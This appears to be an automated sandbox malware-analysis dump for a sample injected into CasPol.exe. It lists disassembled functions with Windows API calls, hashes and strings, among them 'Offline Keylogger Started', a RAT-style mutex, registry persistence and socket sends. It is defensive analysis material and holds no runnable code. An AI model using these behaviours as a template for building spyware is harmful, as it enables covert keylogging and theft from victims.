                                                                                                                                                                          • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040A249
                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040A255
                                                                                                                                                                            • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                                                                                            • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateThread$LocalTimewsprintf
                                                                                                                                                                          • String ID: Offline Keylogger Started
                                                                                                                                                                          • API String ID: 465354869-4114347211
                                                                                                                                                                          • Opcode ID: e9faa5e414620fc96257d4712bcffae5cc82c2583e5401c4a4641fe0a8bebe8a
                                                                                                                                                                          • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                                                                                                                                          • Opcode Fuzzy Hash: e9faa5e414620fc96257d4712bcffae5cc82c2583e5401c4a4641fe0a8bebe8a
                                                                                                                                                                          • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLocalTime.KERNEL32(00000001,00474EF0,004755A8,?,?,?,?,00415D11,?,00000001), ref: 00404F81
                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF0,004755A8,?,?,?,?,00415D11,?,00000001), ref: 00404FCD
                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                                                                                                                                          Strings
                                                                                                                                                                          • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Create$EventLocalThreadTime
                                                                                                                                                                          • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                                          • API String ID: 2532271599-1507639952
                                                                                                                                                                          • Opcode ID: 3ab5d40a6173cc37a5089b7803cdb329b1a20d2c34f33e0a08a5a9fcc06a0ff2
                                                                                                                                                                          • Instruction ID: 4df055e7b18788cc2e6f6b282d58d8d1f041b9f055d7d752625e2c9c7705ec55
                                                                                                                                                                          • Opcode Fuzzy Hash: 3ab5d40a6173cc37a5089b7803cdb329b1a20d2c34f33e0a08a5a9fcc06a0ff2
                                                                                                                                                                          • Instruction Fuzzy Hash: D7110A71900385BAC720A7779C0DEABBFACDBD2714F04046FF54162291D6B89445CBBA
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                                                                                                                          • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                                                                                                                                                          • RegCloseKey.KERNEL32(?), ref: 004137EC
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseCreateValue
                                                                                                                                                                          • String ID: pth_unenc
                                                                                                                                                                          • API String ID: 1818849710-4028850238
                                                                                                                                                                          • Opcode ID: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                                                                                                                                          • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                                                                                                                                                          • Opcode Fuzzy Hash: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                                                                                                                                          • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F60), ref: 00404DB3
                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,?,00474F08,00000000,00000000), ref: 00404DC7
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00404DDB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3360349984-0
                                                                                                                                                                          • Opcode ID: e2c7dcd9189a3044f1cf6e3ebfe82ec704a9a5fd688f20b61e04b54ec391fab7
                                                                                                                                                                          • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                                                                                                                                          • Opcode Fuzzy Hash: e2c7dcd9189a3044f1cf6e3ebfe82ec704a9a5fd688f20b61e04b54ec391fab7
                                                                                                                                                                          • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                                                                                                                                          • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                          • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                                                                                                                          • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                                                                                                                                          • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                                                                                                                          • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                                                                                                                          • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                          • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                                                          • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                                                                                                                          • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                                                          • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C568
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041C576
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$CloseCreateHandleReadSize
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3919263394-0
                                                                                                                                                                          • Opcode ID: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                                                                                                                          • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                                                                                                                                                          • Opcode Fuzzy Hash: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                                                                                                                          • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CountEventTick
                                                                                                                                                                          • String ID: !D@
                                                                                                                                                                          • API String ID: 180926312-604454484
                                                                                                                                                                          • Opcode ID: 943d233b4da6a66401ce6f93dd42c62b0fddc350c13312a5139ff755dbddca0b
                                                                                                                                                                          • Instruction ID: a18c2cf71696728a803f4d48a8d0c2278a59ecc2ec6ff56e3a85b819d46b2ac8
                                                                                                                                                                          • Opcode Fuzzy Hash: 943d233b4da6a66401ce6f93dd42c62b0fddc350c13312a5139ff755dbddca0b
                                                                                                                                                                          • Instruction Fuzzy Hash: 4F51B6315082019AC724FB32D852AFF73A5AF94304F50483FF546671E2EF3C5945C68A
                                                                                                                                                                          APIs
                                                                                                                                                                          • getaddrinfo.WS2_32(00000000,00000000,00000000,00472AF0,h}v,00000000,004151C3,00000000,00000001), ref: 00414F46
                                                                                                                                                                          • WSASetLastError.WS2_32(00000000), ref: 00414F4B
                                                                                                                                                                            • Part of subcall function 00414DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                                                                                                                            • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                                                                                                                            • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                                                                                                                            • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                                                                                                                            • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                                                                                                                            • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                                                                                                                            • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                                                                                                                            • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                                                                                                          • String ID: h}v
                                                                                                                                                                          • API String ID: 1170566393-2591199288
                                                                                                                                                                          • Opcode ID: 930efd5b04e65bc9372c1b57b3a52d6002a1f5a2d46d5e1141b82df15956c107
                                                                                                                                                                          • Instruction ID: b2b0aefd8e35b341f4c894e58f46b645776b5e98a3349e02c71c7f637998c076
                                                                                                                                                                          • Opcode Fuzzy Hash: 930efd5b04e65bc9372c1b57b3a52d6002a1f5a2d46d5e1141b82df15956c107
                                                                                                                                                                          • Instruction Fuzzy Hash: 9DD05B322005316BD310576D6C00FFB569EDFD7760B110037F404D3251DA949C8247AC
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040D0BE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateErrorLastMutex
                                                                                                                                                                          • String ID: Rmc-N6HMP4
                                                                                                                                                                          • API String ID: 1925916568-2778154606
                                                                                                                                                                          • Opcode ID: bc77eaf552dd10d8f01c03cd32d716e6d6dac4663c01f768c58145daaeb2b4d9
                                                                                                                                                                          • Instruction ID: 897831e38bae895769414ba5eaefcaa992d87aaaa8244aa01aad5f1db7de32a1
                                                                                                                                                                          • Opcode Fuzzy Hash: bc77eaf552dd10d8f01c03cd32d716e6d6dac4663c01f768c58145daaeb2b4d9
                                                                                                                                                                          • Instruction Fuzzy Hash: 62D012B0614301EBDB0467709C5975936559B44702F50487AB50BD95F1CBFC88D08519

APIs
• send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
• WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474F08,?), ref: 00404B47
• SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474F08,?,?,?,?,?,?,0040547D), ref: 00404B75
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: EventObjectSingleWaitsend
• String ID:
• API String ID: 3963590051-0
• Opcode ID: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
• Instruction ID: ade4869c8039bafc3f5202e75afdfb18787be874a76dce876c460fae4797ad88
• Opcode Fuzzy Hash: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
• Instruction Fuzzy Hash: 152124B2900119BBCB04ABA1DC95DEEB77CFF14314B00452FF515B71E2EB38AA15C6A4

APIs
• RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
• RegQueryValueExA.KERNEL32 ref: 00413622
• RegCloseKey.KERNEL32(?), ref: 0041362D
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
• Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
• Opcode Fuzzy Hash: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
• Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4

APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
• RegQueryValueExA.KERNEL32 ref: 00413768
• RegCloseKey.KERNEL32(00000000), ref: 00413773
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
• Instruction ID: cdc8bb2f12cdea1da97e3e4d454c68039a4c25ad8704162e95ac064a0ac82555
• Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
• Instruction Fuzzy Hash: C301AD7540022DFBDF215F91DC04DEB3F38EF05761F008065BE09620A1E7358AA5EB94

APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
• RegQueryValueExA.KERNEL32 ref: 004135C2
• RegCloseKey.KERNEL32(?), ref: 004135CD
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
• Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
• Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
• Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94

APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413551
• RegQueryValueExA.KERNEL32 ref: 00413565
• RegCloseKey.KERNEL32(?), ref: 00413570
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
• Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
• Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
• Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4

APIs
• RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
• RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
• RegCloseKey.KERNEL32(004660B4), ref: 004138E6
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseCreateValue
• String ID:
• API String ID: 1818849710-0
• Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
• Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
• Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
• Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8

APIs
• GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EE69
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Info
• String ID:
• API String ID: 1807457897-3916222277
• Opcode ID: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
• Instruction ID: 2d4132b881e94a0a9fd0de77a922cbe9b4a8b8c61ff6a95216f325efaac8b060
• Opcode Fuzzy Hash: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
• Instruction Fuzzy Hash: 7E411070504748AFEF218E25CC84AF7BBB9FF45304F2404EEE59987142D2399A46DF65
APIs
• GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
Strings
Memory Dump Source
• Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
Similarity
• API ID: Info
• String ID:
• API String ID: 1807457897-3916222277
APIs
• LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448CA4
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: String
• String ID: LCMapStringEx
• API String ID: 2568140703-3893581201
APIs
• LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
Strings
Memory Dump Source
• Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
Similarity
• API ID: String
• String ID: LCMapStringEx
• API String ID: 2568140703-3893581201
APIs
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Alloc
• String ID: FlsAlloc
• API String ID: 2773662609-671089009
APIs
Strings
Memory Dump Source
• Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
Similarity
• API ID: Alloc
• String ID: FlsAlloc
• API String ID: 2773662609-671089009
APIs
• try_get_function.LIBVCRUNTIME ref: 00438E29
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
